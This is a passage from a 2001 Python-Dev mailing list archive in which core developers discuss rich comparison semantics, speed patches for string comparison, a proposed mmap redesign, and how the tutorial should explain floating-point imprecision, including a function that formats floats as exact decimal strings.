> couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full
> cmp, so I put the dict oldcmp back in order to avoid having dict
> richcmp (potentially) compute cmp 3 times to fake one cmp.  But if
> dict richcmp knew a cmp outcome was desired, it could compute it
> with no extra work to speak of.  Then there would be no reason at
> all to hold on to the dict tp_compare slot.

I'm not sure I see the saving.  There's no real saving in time,
because you still have to make separate calls for EQ and CMP, right?

There might be a saving in code, but you could solve that internally
in dictobject.c by restructuring the code somewhat so that
dict_compare shared more with dict_richcompare, right?

It's mostly an API streamlining.  The other difference between
tp_compare and tp_richcompare is that the latter returns an object
which makes testing for errors unambiguous.

But (for several releases) we would still have to support tp_compare
for b/w compatibility with old 3rd-party extensions.

> The list and tuple richcmps are also doing almost all the work needed to
> compute a 3-way cmp outcome.

Ditto.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Sun May 20 18:19:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 18:19:29 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>
Message-ID: <3B07EE91.5747F4F4@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > How about making performance the main "feature" for 2.3 then ?!
> 
> Guido may be a dictator, but he doesn't have a magic wand -- "the main
> feature" is what people volunteer to do and then fight for and then actually
> do.

I will certainly go back to the basics and redo my optimization
patches for Python later this year. Whether or not these will
get included in the core is another story, but I have a need for
a fast interpreter for my app. server and can't afford losing
too much performance when moving from 1.5.x to 2.x.
 
> > 2.0 - 2.2 introduced many new features in the interpreter core,
> > so I think it's time to stabilize those features and focus on
> > making Python regain the performance it had before those features
> > were introduced.  At least to some of us, performance is an
> > issue and I think that there's a lot we can do to improve it.
> 
> "Performance" is meaningless unless quantified and made concrete:  what is it
> that runs too slowly?  "Everything" is not a useful answer.  Speeding up
> line-at-a-time input was an example of something that worked, via focus and
> measurement and pushing ahead despite opposition.  I doubt any other approach
> will bear fruit over such a short timeframe, and especially not without
> resources to throw at it.

Let's put it this way: if pystone gets a 50% boost, then all
applications should benefit from it, regardless of whether they
are function-call intensive or fiddle with a lot of attributes.
Achieving those 50% will be a lot harder than for the 1.5
series, though ;-)
 
> > One way to open up the field for better performance will be
> > to modularize the interpreter, so that new ways of optimization
> > can be explored, e.g. turning the VM into a register machine
> > (Skip once started looking into this with his Rattlesnake
> > patches) or creating specialized VMs which can then be used
> > by optimizing compilers as targets.
> 
> Restructure the core for the benefit of optimizing compilers that don't
> exist?  That sounds like an interesting research project, but not much to do
> with making 2.3 faster.  In the meantime, modularization is more likely to
> make the VM that does exist slower.

Depends on how you look at it: extension writers will then
have the possibility of plugging in new compilers and VMs
into Python to experiment with new optimization strategies.

The Rattlesnake project is one such project which would do
great with this plugin logic since it uses special opcodes
which an optimizer generates and then needs a modified VM
to execute these new byte code streams...

from Rattlesnake import compiler, vm
sys.use_compiler(compiler)
sys.use_vm(vm)

This won't make stock Python 2.3 faster, but at least provide
better means for experiments in that direction.
Alternative VM implementations like Stackless Python would 
also benefit from it.



From tim.one at home.com  Sun May 20 23:13:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:13:04 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>

[Martin v. Loewis, on pointer-equality tests in string_compare()]

> I've done some measurements here, too, again taking your example
> ...
>     for i in indices:
>         "ab" < "ab"
> ...
> This is the case where testing for identity helps. Running it without
> identity test takes 0.74s, running it with identity test takes 0.68s.

This stuff all ties together.  A pointer-equality test in string_compare() is
guaranteed to lose every time string_compare() gets called from
lookdict_string().  Let's lose string_compare() entirely (in favor of a
self-contained-- apart from memcmp() --string_richcompare).


From tim.one at home.com  Sun May 20 23:37:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:37:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGIKDAA.tim.one@home.com>

[Tim, muses about a Py_CMP value for rich comparisons, and talks
 mostly about dict comps]

> ...
> I'm not sure I see the saving.  There's no real saving in time,
> because you still have to make separate calls for EQ and CMP, right?

Right so far as it goes.  A "fast path" (which currently doesn't exist but is
clearly worth adding, based on both my and Martin's timings) for doing *all*
kinds of same-type comparisons would only have to look for a richcompare
slot, though, not one kind of slot in some cases and another in others.
Uniformity is contagious <wink>.

> There might be a saving in code, but you could solve that internally
> in dictobject.c by restructuring the code somewhat so that
> dict_compare shared more with dict_richcompare, right?

Right, there would be no reduction in total code, and the dict routines
already share as much as possible.  In effect, the body of dict_compare would
replace the last

		res = Py_NotImplemented;

line in the (currently tiny) dict_richcompare guarded by the appropriate
tests.

> It's mostly an API streamlining.

Bingo, and the possibility of retiring the tp_compare slot in P3K.

> The other difference between tp_compare and tp_richcompare is that
> the latter returns an object which makes testing for errors unambiguous.

Also cool.

> But (for several releases) we would still have to support tp_compare
> for b/w compatibility with old 3rd-party extensions.

Sure, although the way the CVS branch code is going it could be that 2.2 is
the long-awaited utterly incompatible P3K anyway <wink>.

>> The list and tuple richcmps are also doing almost all the work needed
>> to compute a 3-way cmp outcome.

> Ditto.

Oh no!  Those aren't like dict compares.  A rich compare for sequence types
(whether strings or lists) *has* to contain almost all the code necessary to
implement cmp(), because just resolving Py_EQ in all cases has to find "the
first" element (if any) that differs.  Once that's known, you're at most one
measly element compare away from producing the right cmp() outcome.  This
isn't true of dict compares:  the algorithm for resolving dict Py_EQ/Py_NE
when the dict sizes are the same doesn't do anything to help resolve general
cmp().  Yes, a tp_compare slot could be re-added to lists and tuples, and
implemented via refactoring their current tp_richcompare code into a common
internal routine, but then we've just added another layer of function calls
for all cases.  I've timed C function calls, and it turns out they aren't
actually free <wink>.
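
The argument can be made concrete with a Python model of a sequence rich compare. Finding the first differing index needs only `==`; after that, every operator, and a "CMP" request standing in for the proposed Py_CMP, costs at most one more element compare. The string op codes are illustrative rather than CPython's API, and the model assumes the elements are totally ordered.

```python
import operator

# Illustrative op codes; "CMP" models the proposed Py_CMP request.
_OPS = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
        "!=": operator.ne, ">": operator.gt, ">=": operator.ge}

def _three_way(a, b):
    return (a > b) - (a < b)

def seq_richcompare(v, w, op):
    """Compare sequences v and w for an op in _OPS, or for "CMP"."""
    n = min(len(v), len(w))
    i = 0
    # Work shared by every op: locate the first pair of elements that differ.
    while i < n and v[i] == w[i]:
        i += 1
    if i == n:
        # No differing pair: one is a prefix of the other, so lengths decide.
        if op == "CMP":
            return _three_way(len(v), len(w))
        return _OPS[op](len(v), len(w))
    # A differing pair exists, so == and != are already resolved ...
    if op == "==":
        return False
    if op == "!=":
        return True
    # ... and every other outcome needs just one more element compare.
    if op == "CMP":
        return -1 if v[i] < w[i] else 1
    return _OPS[op](v[i], w[i])
```

Note that the dict case has no analogue of the shared "first difference" loop, which is why it doesn't fit this pattern.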


From tim.one at home.com  Mon May 21 09:53:24 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 03:53:24 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>

[Guido]
> I would like to break this down by defining the mapping between cmp()
> and rich comparisons.

Good idea!

> I propose:
>
> - If cmp() is requested but not defined, and rich comparisons are
>   defined, try ==, <, > in order; if all three yield false, act as if
>   rich comparisons were not defined, and use the fallback comparison
>   (i.e. by address).

Here and below didn't cover the case where cmp() is requested and is defined.
I believe it's agreed now (but wasn't yet at the time you wrote this) that
cmp() will be called in that case (and which requires changes to the current
implementation).
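
A minimal Python sketch of the two mappings Guido proposes, written as free functions with hypothetical names. The first derives a 3-way result from ==, < and >, tried in that order, and falls back when all three are false. The second derives a rich comparison from a cmp() result. The fallback uses id() as a stand-in for the by-address ordering the proposal mentions.

```python
import operator

def cmp_from_rich(x, y):
    """Derive cmp(x, y) from rich comparisons, trying ==, <, > in order."""
    if x == y:
        return 0
    if x < y:
        return -1
    if x > y:
        return 1
    # All three were false: order by identity ("address"); 0 only if x is y.
    return (id(x) > id(y)) - (id(x) < id(y))

_FROM_CMP = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
             "!=": operator.ne, ">": operator.gt, ">=": operator.ge}

def rich_from_cmp(op, c):
    """The "obvious mapping": x op y is c op 0, where c = cmp(x, y)."""
    return _FROM_CMP[op](c, 0)
```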

> - If a rich comparison is requested but not defined, use cmp() and use
>   the obvious mapping.

Cool, except this is missing what I believe was the intended detail, such as that
when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be
tried before falling back to cmp().  Also note this today:

class C:
    def __lt__(x, y):
        print "in __lt__"
        return NotImplemented

    def __gt__(x, y):
        print "in __gt__"
        return NotImplemented

C() < C()

That prints

in __lt__
in __gt__
in __gt__
in __lt__

I don't know how to explain why each method gets called twice (well, I do, but
it's hard to swallow <wink>).  Again this can have semantic consequences,
e.g. if the methods have side-effects; and it's unclear whether this is intended,
a bug, or implementation-defined.
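
For comparison with later behaviour, here is a small sketch that records the calls instead of printing them. Under Python 3 (outside the scope of this 2001 discussion) each method is tried exactly once: x.__lt__(y), then the reflected y.__gt__(x), after which `<` raises TypeError because both returned NotImplemented.

```python
calls = []

class C:
    def __lt__(self, other):
        calls.append("__lt__")
        return NotImplemented

    def __gt__(self, other):
        calls.append("__gt__")
        return NotImplemented

def trace_less_than():
    """Evaluate C() < C(); return (methods called, exception type name)."""
    del calls[:]
    try:
        C() < C()
    except TypeError as exc:
        return list(calls), type(exc).__name__
    return list(calls), None
```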

> - Continue to define the comparison of unequal sequences in terms of
>   cmp().

"the comparison" is ambiguous there:  you mean all comparisons?  just cmp()
comparisons?  just rich comparisons?

In any case, also unclear what "in terms of cmp()" means:  that every pair of
corresponding elements must be compared via cmp()?  Or that only the first
non-Py_EQ pair must be compared via cmp()?  Pseudo-code would be much clearer
than English here.

> - Testing == or != for sequences takes these shortcuts:

Must take these shortcuts, or may take these shortcuts?

>   1. if the lengths differ, the sequences differ

Note that I removed the tuple_richcompare code for doing this, because I
never found a case where tuples were compared via Py_EQ/Py_NE and the lengths
differed.  So the length-check in this case was a waste of time.  It isn't
true of lists or strings that it's a waste of time, but I believe there are
strong reasons for why programs simply will not compare different-sized
tuples for equality.  I would not like to pay for tuple length checks if only
one case in 500 billion would benefit, but if #1 is a mandatory shortcut
there's no choice.

>   2. compare the elements using == until a false return is found

Currently the sequence rich-compare code does #2 for all 6 comparison
operators.  Is that wrong?  Looked reasonable to me!

> Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
> easily go the extra mile and define != to use only != on the items;
> but is this worth the extra complexity?

Not at all:  tuples and lists are Python's sequence types, so Python is
entitled to define what comparison means for them in any way it likes.  We've
already got cases where (see the first msg in this thread)

    [x] cmpop [y]

may yield a different result than

    x cmpop y

so we've already punted on doing the best-possible job of mimicking whatever
crazy-ass comparisons user-defined objects implement, when those objects are
contained in Python sequences.

My bias is showing <wink>:  I want Python's builtin sequence types to be as
efficient as possible.

Nasty example:  two conformable (same rank and dimensions) NumPy matrices A
and B return a conformable matrix of 0/1 bits when compared via "<" (well,
maybe they actually don't, but that's what drove richcmps to begin with!).
It may well be *convenient* for them if

    (A1, A2, A3) < (B1, B2, B3)

always returned a list (or tuple) of 3 0/1 matrices too:

    [A1 < B1, A2 < B2, A3 < B3]

So builtin sequence comparisons can't be all things to all people regardless.


From Barrett at stsci.edu  Mon May 21 14:17:09 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Mon, 21 May 2001 08:17:09 -0400
Subject: [Python-Dev] mmap module
References: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>
Message-ID: <3B090745.5D70353E@STScI.Edu>

Tim Peters wrote:
> 
> [Paul Barrett]
> > In the CVS log of the mmapmodule.c, Tim Peters says:
> >
> > "The code really needs to be rethought from scratch (not by me, though
> > ...)."
> 
> That was in specific reference to the code I changed, in mmap_find_method.
> The difficulty is that mmap is great for "large files", but the code before
> my change used a C int for the starting offset and also for the return
> value; I boosted those to a C long, which covers 63 bits on 64-bit Linux
> boxes, but doesn't help 64-bit Windows at all (where a C long remains 4
> bytes).  The mmap_object struct uses size_t to declare the relevant members,
> which is possibly better still than C long, but may still leave platform
> capabilities out of reach for large files (e.g., "even Win95" *allows*
> specifying 64-bit offsets when creating a mapped file view).  C is a
> friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue()
> don't cater to the full range of C integral types anyway.  In other words,
> if this code is ever to reach its full potential, it "really needs to be
> rethought from scratch".

OK, thanks for the clarification.

> > The ability to have offsets into a file that are not multiples of the
> > system pagesize would also be nice.
> 
> It's OS-specific.  Python should grow warts to protect against it on the
> OSes that care.

Well, hopefully the OS-differences wouldn't prevent implementing a
more abstract interface.

> > I'd be willing to submit a PEP on a new mmapmodule, once I know what
> > others would like.
> 
> Hard to say.  This has the potential to become Python's next thread
> subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
> you do write a PEP, I vote to say that we'll cover Windows and Linux (and
> maybe Mac OS X?) out of the box, but any other platform is at your own risk
> (it doesn't really help if somebody pops up volunteering to support a
> minority platform, because they eventually go away, their code stops
> working, and it never gets fixed -- so it's use-at-your-own-risk in reality
> regardless).

Yes, I agree.  Windows, Unix/Linux, and Mac OS X should be the
supported platforms.

My intention is not to make major changes to the Python interface, but
to fix bugs and to implement some additional features, such as a
non-pagesize file offset.  I'll try to get something written up in the
near future.
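
One common way to offer non-page-aligned offsets on top of an interface that requires aligned ones is to map from the nearest lower boundary and slice. The sketch below uses Python's mmap module as it exists in modern Python, where the `offset` argument must be a multiple of mmap.ALLOCATIONGRANULARITY; the function name is hypothetical, and it only handles read-only access to bytes that already exist in the file.

```python
import mmap
import tempfile

def read_unaligned(f, offset, length):
    """Return `length` (> 0) bytes starting at any `offset` of open file `f`.

    Maps from the nearest lower ALLOCATIONGRANULARITY boundary, because the
    mmap `offset` argument must be a multiple of that value.
    """
    gran = mmap.ALLOCATIONGRANULARITY
    start = offset - offset % gran    # aligned start of the mapping
    delta = offset - start            # where the wanted bytes begin in it
    with mmap.mmap(f.fileno(), delta + length,
                   access=mmap.ACCESS_READ, offset=start) as m:
        return m[delta:delta + length]

if __name__ == "__main__":
    data = bytes(range(256)) * 100
    with tempfile.TemporaryFile() as f:
        f.write(data)
        f.flush()
        assert read_unaligned(f, 5000, 10) == data[5000:5010]
```

The cost is mapping up to one extra granule per call, which is usually negligible next to the convenience of arbitrary offsets.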

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 18:44:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 18:44:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de>

> This stuff all ties together.  A pointer-equality test in string_compare() is
> guaranteed to lose every time string_compare() gets called from
> lookdict_string().  Let's lose string_compare() entirely (in favor of a
> self-contained-- apart from memcmp() --string_richcompare).

Ok. I've now updated my patch on SF to remove string_compare, inline
everything into string_richcompare, add _PyString_Eq, and use that in
lookdict_string. Who would want to review and approve/reject this
patch?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 19:03:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 19:03:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>

> Note that the usual way to write this is
> 
>  		if (c < 0 && PyErr_Occurred())
> 
> More work for my artificial "ab" < "cd" case but a net win in real life (when
> c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
> when c < 0 there's no way in the cmp protocol to use c's value alone to
> distinguish between "less than" and "error").

Ok. I've updated my tp_compare patch on SF to do so; it also
un-deprecates UserList.__cmp__.

> > Here, I get 3 function calls: f is string_compare, then
> > PyErr_Occurred, finally convert_3way_to_object, which converts
> > {-1,0,1} x Op -> {Py_True, Py_False}.
> 
> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

Any reason why PyThreadState_GET isn't used there?

> There's no danger of over-indexing when ob_size==0, because it doesn't
> include the trailing null byte Python always sticks at the end of string
> objects; and the first-byte check is much more likely to pay off than the
> zero-length check (comparison to a null string?  gotta be rare as clear
> conclusions <wink>), and better to test for the more common case first.

This is now also in the string_richcompare patch on SF.

Regards,
Martin


From tim.one at home.com  Mon May 21 20:29:02 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 14:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>

[Fred checkin]
> > ***************
> > *** 2610,2617 ****
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200*200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.4, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]
> > --- 2610,2617 ----
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200 * 200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.400000000000002, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]

[Guido]
> Hmm...  The tutorial now contains at least one example of floating
> point imprecision.  Does it also contain text to explain this?  (I'm
> sure Tim would be happy to provide some if there isn't any. :-)

[Fred]
> It contains others, and I don't think there's an explanation.  Some
> text from Tim to explain this would be greatly appreciated!

Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
so long as we rely on the platform C to format floats, the output isn't
well-defined (the last digit or so can and will vary across boxes).

I can certainly explain that this is so, and even why, but unsure the
tutorial is the right place for it.  In any case the tutorial shouldn't be
giving examples whose output is platform-dependent.  For example, don't use
10 * 3.14, use 10 * 3.25.  Want me to scour the tutorial for all such cases?
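
The rule of thumb can be checked mechanically: fractions.Fraction converts a float exactly, so a float product has no rounding error exactly when it equals the exact rational product of its inputs. A small sketch; the helper name is made up for illustration.

```python
from fractions import Fraction

def product_is_exact(a, b):
    """True if the float product a * b involved no rounding error."""
    return Fraction(a * b) == Fraction(a) * Fraction(b)

print(product_is_exact(10, 3.14))   # False: the multiplication had to round
print(product_is_exact(10, 3.25))   # True: 3.25 == 13/4, so 32.5 is exact
```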

Or we could put the attached function at the start of the tutorial and use it
to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that <wink>.


def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)
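The function above is Python 2 code, and its `0L`/`5L`/`10L` long literals are a syntax error in Python 3. Below is a minimal Python 3 port that keeps the same algorithm. On modern Pythons, `decimal.Decimal(x)` converts a float exactly, which makes it a convenient cross-check. That check is an addition and not part of the original.

```python
import math
from decimal import Decimal

def f2ds(x):
    """Return float x as an exact decimal string, e.g. '5e-1' for 0.5.

    Python 3 port of the function above; infinities and NaNs are still
    ignored.
    """
    if x == 0:
        return "0e0"
    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)           # x == f * 2**e exactly, 0.5 <= f < 1
    CHUNK = 28
    top = 0                        # Python 3 ints are unbounded; no 0L suffix
    while f:                       # invariant: x == (top + f) * 2**e
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        top = (top << CHUNK) | digit
        f -= digit
        e -= CHUNK

    while e < 0 and top & 1 == 0:  # optional: drop trailing zero bits
        top >>= 1
        e += 1

    if e > 0:                      # x == top * 2**e, an integer
        top <<= e
        e = 0
    elif e < 0:                    # top / 2**-e == top * 5**-e * 10**e
        top *= 5 ** -e

    while top % 10 == 0:           # strip trailing decimal zeroes
        top //= 10
        e += 1
    return "%s%de%d" % (sign, top, e)

x = 10 * 3.14
print(f2ds(x))
print(Decimal(f2ds(x)) == Decimal(x))   # True
```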


From guido at digicool.com  Mon May 21 21:02:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 15:02:43 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT."
             <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com>

> Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
> so long as we rely on the platform C to format floats, the output isn't
> well-defined (the last digit or so can and will vary across boxes).

I can't check right now, but I thought that this was pretty consistent
across some common platforms?

> I can certainly explain that this is so, and even why, but I'm unsure
> the tutorial is the right place for it.  In any case the tutorial
> shouldn't be giving examples whose output is platform-dependent.
> For example, don't use 10 * 3.14, use 10 * 3.25.  Want me to scour
> the tutorial for all such cases?

Are you serious?

This is something that any newbie who is in the least bit adventurous
will run into anyway, so I don't think that not talking about this at
all in the tutorial is fair or helpful.  That just perpetuates the
questions from newbies about "floating point is broken" -- since none
of the tutorial examples prepare them for this.

Since this is behavior that is ordinarily observed and perpetually
perplexing, I think it *must* be treated in the tutorial.  The
tutorial doesn't have to have the full explanation -- maybe it's
enough to say something like ``due to round-off errors you will
sometimes see inexact results like 31.400000000000002; don't worry
about this, you can use str() or "%g" (but not round()!) to strip
redundant precision, and here's a URL for more info.''
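The sketch below illustrates Guido's suggestion. It assumes Python 2.1's behaviour, in which `repr()` of a float used 17 significant digits and `str()` used 12. Modern Pythons print the shortest string that round-trips instead, so the sketch reproduces the old output explicitly with `%.17g` and `%.12g`.

```python
x = 1.1

# What Python 2.1's repr() (17 significant digits) showed at the prompt:
print('%.17g' % x)            # 1.1000000000000001
# What its str(), i.e. print, showed (12 significant digits):
print('%.12g' % x)            # 1.1
# "%g" defaults to 6 significant digits:
print('%g' % x)               # 1.1
# round() returns another binary float, here the very same one, so it
# cannot remove the representation error:
print(round(x, 1) == x)       # True
print('%.17g' % round(x, 1))  # 1.1000000000000001
```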

Or maybe the full story can be an appendix.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:09:04 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:09:04 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM
Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
> Or maybe the full story can be an appendix.

Or maybe Decimal should go in the standard distribution?  What kind of
deadline do I have for finishing that to go into 2.2?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:35:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:35:10 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT."
             <20010521200904.05CAE99C81@waltz.rahul.net> 
References: <20010521200904.05CAE99C81@waltz.rahul.net> 
Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com>

> > Or maybe the full story can be an appendix.
> 
> Or maybe Decimal should go in the standard distribution?  What kind of
> deadline do I have for finishing that to go into 2.2?

Adding Decimal to the distribution is fine.  But using it by default
for floating point literals and other floating point results is a
different story.  The PEP about that hasn't really been discussed
enough to make a decision, but a conservative estimate is that this
change won't be made in 2.2.  So Decimal doesn't solve the problem the
tutorial has.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:42:15 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:42:15 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM
Message-ID: <20010521204215.F216699C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
>>> Or maybe the full story can be an appendix.
>> 
>> Or maybe Decimal should go in the standard distribution?  What kind of
>> deadline do I have for finishing that to go into 2.2?
> 
> Adding Decimal to the distribution is fine.  But using it by default
> for floating point literals and other floating point results is a
> different story.  The PEP about that hasn't really been discussed
> enough to make a decision, but a conservative estimate is that this
> change won't be made in 2.2.  So Decimal doesn't solve the problem the
> tutorial has.

Wasn't thinking of going quite that far, only changing the tutorial to
say something like, "If you want speed, use the hardware FP (which is
directly supported by Python's floating literals); if you want accuracy,
use Decimal."  (Or FixedPoint, which is already in the distribution.)
The full story needn't go in the Appendix; we can simply refer people to
Cowlishaw and Kahan.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:57:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:57:08 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT."
             <20010521204215.F216699C81@waltz.rahul.net> 
References: <20010521204215.F216699C81@waltz.rahul.net> 
Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com>

[Aahz]
> >>> Or maybe the full story can be an appendix.
> >> 
> >> Or maybe Decimal should go in the standard distribution?  What kind of
> >> deadline do I have for finishing that to go into 2.2?

[Guido]
> > Adding Decimal to the distribution is fine.  But using it by default
> > for floating point literals and other floating point results is a
> > different story.  The PEP about that hasn't really been discussed
> > enough to make a decision, but a conservative estimate is that this
> > change won't be made in 2.2.  So Decimal doesn't solve the problem the
> > tutorial has.

[Aahz]
> Wasn't thinking of going quite that far, only changing the tutorial to
> say something like, "If you want speed, use the hardware FP (which is
> directly supported by Python's floating literals); if you want accuracy,
> use Decimal."  (Or FixedPoint, which is already in the distribution.)
> The full story needn't go in the Appendix; we can simply refer people to
> Cowlishaw and Kahan.

I think that most people don't care about either speed or accuracy,
but (being Python users) everybody cares about convenience, and
convenience is using the built-in floating point literals.  (Also,
most other modules returning or using floating point numbers use
binary floating point, e.g. the time module and of course the math
module.)

As long as the built-in literals are binary floating point, they are
what 99% of the code uses, so we need to explain the pitfalls.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at cj42289-a.reston1.va.home.com  Mon May 21 23:47:35 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Mon, 21 May 2001 17:47:35 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental updates to the Python 2.2 documentation.


From tim at digicool.com  Mon May 21 23:57:22 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 17:57:22 -0400
Subject: [Python-Dev] FP vs. tutorial
